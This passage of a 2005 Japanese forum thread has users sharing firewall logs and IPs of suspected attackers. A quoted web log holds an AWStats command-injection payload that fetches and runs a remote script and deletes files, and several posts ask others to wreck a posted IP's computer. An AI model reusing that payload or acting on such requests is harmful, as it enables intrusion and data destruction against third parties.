簡単に自ホストのセキュリティホールをチェックする方法って
何かないかな。
個別ポート指定でスキャンスするサイトなら知ってる。
>>946 サーバ(マシン全体あるいはウェブサーバ)がじゃなくて、
awstatsの特定バージョンに穴があるんでしょ。有名やん。
うちにも同じのはときどきくる。最新は29日に219.166.34.48からきた。
IPアドレス 202.231.11.246
ホスト名 intrasrv.asahikawa-nct.ac.jp
IPアドレス
割当国 ※ 日本 (JP)
210.143.155.18:135
フリービット株式会社
何か攻撃してくるお(><)
951 :
名無しさん@お腹いっぱい。:2005/11/03(木) 01:02:40
218.217.109.45
achrsm002045.adsl.ppp.infoweb.ne.jp
952 :
名無しさん@お腹いっぱい。:2005/11/03(木) 01:17:49
アクセス禁止にされたサイトを見る方法ってありますか?
953 :
名無しさん@お腹いっぱい。:2005/11/03(木) 01:20:29
ZD084196.ppp.dion.ne.jp
IP(220.214.84.196)
このIPのPC壊すことできますか?
できたらやってください。
>>953 んで、その人がリモートホストを変えない自信はどこからあふれてきてるんですか?
955 :
名無しさん@お腹いっぱい。:2005/11/03(木) 02:08:54
わからんけどこわしてw
. + /K\ /K\ /K\ + 復讐っ
復讐っ( ´∀`∩(´∀`∩)( ´ー`)
+ (( (つ ノ(つ 丿(つ つ )) +
ヽ ( ノ ( ノ ) ) ) 復讐っ
復讐っ(_)し' し(_) (_)_)
いつまでも同じホスト踏み台にしてるようなアフォのPCなら勝手に壊れるだろ
958 :
名無しさん@お腹いっぱい。:2005/11/03(木) 02:38:18
壊せないのか。
960 :
名無しさん@お腹いっぱい。:2005/11/03(木) 02:50:46
ZD084196.ppp.dion.ne.jp
IP(220.214.84.196)
じゃあやれる人やっちゃって
泥棒の家は用心深いもの
962 :
名無しさん@お腹いっぱい。:2005/11/03(木) 03:14:03
ZD084196.ppp.dion.ne.jp
IP(220.214.84.196)
これ多分用心してないとおもわれ
じゃやってみな
踏み台にされてるだけのヤツならこっちが犯罪だぞ
これも酷い。
2005/11/01(08:15:02) W-SV 211.21.21.227 [80] 302 29 "HEAD / HTTP/1.0" ( )
2005/11/02(20:50:19) W-SV 221024.ds.nac.net(66.246.72.156) [80] 404 0 "GET /awstats.pl?configdir=|echo%20;cd%20/tmp;rm%20-rf%20*;wget%20http//203.204.230.205/vnc8.gif;perl%20vnc8.gif;echo%20;rm%20-rf%20vnc8.gif*;echo| HTTP/1.1" ( dummy )
2005/11/02(20:50:21) W-SV 221024.ds.nac.net(66.246.72.156) [80]
2005/11/02(20:50:22) W-SV 221024.ds.nac.net(66.246.72.156) [80]
2005/11/02(20:50:22) W-SV 221024.ds.nac.net(66.246.72.156) [80]
2005/11/02(20:50:22) W-SV 221024.ds.nac.net(66.246.72.156) [80]
2005/11/02(20:50:23) W-SV 221024.ds.nac.net(66.246.72.156) [80]
2005/11/02(20:50:23) W-SV 221024.ds.nac.net(66.246.72.156) [80]
2005/11/02(20:50:24) W-SV 221024.ds.nac.net(66.246.72.156) [80] 404 0 "GET /stats/cgi-bin/awstats.pl?configdir=|echo%20;cd%20/tmp;rm%20-rf%20*;wget%20http//203.204.230.205/vnc8.gif;perl%20vnc8.gif;echo%20;rm%20-rf%20vnc8.gif*;echo| HTTP/1.1" ( dummy )
抜けてるのは同じような内容。パスが微妙に違うだけ。
965 :
名無しさん@お腹いっぱい。:2005/11/04(金) 12:39:24
219.114.1.167
OCN! OCN!
hodogaya
966 :
名無しさん@お腹いっぱい。:2005/11/04(金) 14:06:22
PHPのセキュリティ問題深刻だな。
管理者なおまいらは注意しろよ。
あぱっち!あぱっち!
968 :
名無しさん@お腹いっぱい。:2005/11/04(金) 18:54:50
ほれ来た!
222.13.84.223
ZQ084223.ppp.dion.ne.jp
219-100-38-145.denkosekka.ne.jp [219.100.38.145]
Port:4498にやたらアクセスがあった
IPアドレス「 210.154.158.201 」
ホスト名 「 ris3201.ryucom.ne.jp 」
忘れかけた頃に間違い無く突撃して来るんだよな・・・
沖縄って甘い連中が多いのか?
日付と時刻: 2005.11.5 2:06:38 AM
処理: アクセス試行を拒否しました
サービス: 不明
ポート: 135
モード: TCP
IP アドレス: 210.139.197.176
ホスト名: p8bc5b0.onenum03.ap.so-net.ne.jp
ソネットの糞バカ! ネトゲ止めれ!
972 :
名無しさん@お腹いっぱい。:2005/11/05(土) 09:42:27
220.97.150.183
OCN
NEWTEAR攻撃ってのとフラグメントフラッドエラーってのが交互に頻繁にあります。
恐いです・・・
216 名前:名無しさん@お腹いっぱい。 投稿日:05/01/22 18:37:37
>>216 スレ勉しる。
おまいの晒したIP無意味だぽ。
反論したければ、特定結果かもしくは通報の返答をうpしる。
っても、池沼にゃ無理な相談か。。。
>>216 m9(^Д^)
*NetBIOS www.naver.co.kr NETBIOS_DGM 受信 UDP
パソコンを起動するとファイヤーウォールに必ずこれが出てきます。
時間を見るとパソコン起動時か、ネット接続時などの早期に繋がっているようです。
もちろんNAVERには行っていません。
2ちゃんねるのスポンサーなのでそのせいでしょうか?
誰かわかる方いたら教えてください・・・
IPアドレス 133.46.31.48
ホスト名 carnation.ier.hit-u.ac.jp
IPアドレス
割当国 ※ 日本 (JP)
このIPからしつこくポートスキャンくるんだけど個人?
61.213.156.139
role: Japan Network Information Center
address: Kokusai-Kougyou-Kanda Bldg 6F, 2-3-4 Uchi-Kanda
address: Chiyoda-ku, Tokyo 101-0047, Japan
country: JP
phone: +81-3-5297-2311
fax-no: +81-3-5297-2312
e-mail:
[email protected] admin-c: JI13-AP
tech-c: JE53-AP
nic-hdl: JNIC1-AP
mnt-by: MAINT-JPNIC
changed:
[email protected] 20041222
changed:
[email protected] 20050324
changed:
[email protected] 20051027
source: APNIC
979 :
名無しさん@お腹いっぱい。:2005/11/05(土) 19:17:42
IPドメインSEARCHで調べたらここだった踏み台かな?
Network Information: [ネットワーク情報]
a. [IPネットワークアドレス] 61.213.156.128/27
b. [ネットワーク名] REDSHERIFF
f. [組織名] レッド・シェリフ株式会社
g. [Organization] Red Sheriff
m. [管理者連絡窓口] SE462JP
n. [技術連絡担当者] SE462JP
n. [技術連絡担当者] TT6344JP
p. [ネームサーバ]
[割当年月日] 2003/04/11
[最終更新] 2003/04/11 18:12:03(JST)
以下の3つから大量にftpアタック。
63.110.56.253
68.225.152.253
208.189.27.253
以下からはWebHintsの脆弱性狙いのアタック。
62.101.193.244
981 :
名無しさん@お腹いっぱい。:2005/11/06(日) 07:51:53
220.210.120.74
t120074.ipgw.phs.yoyogi.mopera.
IPって晒されたらヤヴァいの?
あとためしにこのIPについて調べてくだせぇ
i220-108-0-187.s02.a001.ap.plala.or.jp
もうヤヴァすぎ
>>983 もぉー
プンプン(←きしょww
>>984 どこで調べましたか?
>>1のリンクにあるやつ?
教えてチャソスマソ
( ・∀・)<エロいなうんこマン。教えてぇー!
986 :
名無しさん@お腹いっぱい。:2005/11/06(日) 11:27:10
IPアドレス 60.124.139.28
ホスト名 YahooBB060124139028.bbtec.net
987 :
名無しさん@お腹いっぱい。:2005/11/06(日) 11:28:44
つーか全部IP偽装でアタックしてんだよ
あほかこのスレ
もうやめれ
IP偽装の仕組み知ってる?
IP偽装でどんな攻撃ができるかとか。
IP偽装だと不正アクセスはできない。
>>988 それは、ギャグで言っているのか?(AA略)
もうすぐカウントダウン開始で終焉。
次スレ立てるなよ!
992 :
名無しさん@お腹いっぱい。:2005/11/06(日) 13:10:35
このスレッドは1000を超えました。
もう書けないので、終わりです。
あらあら。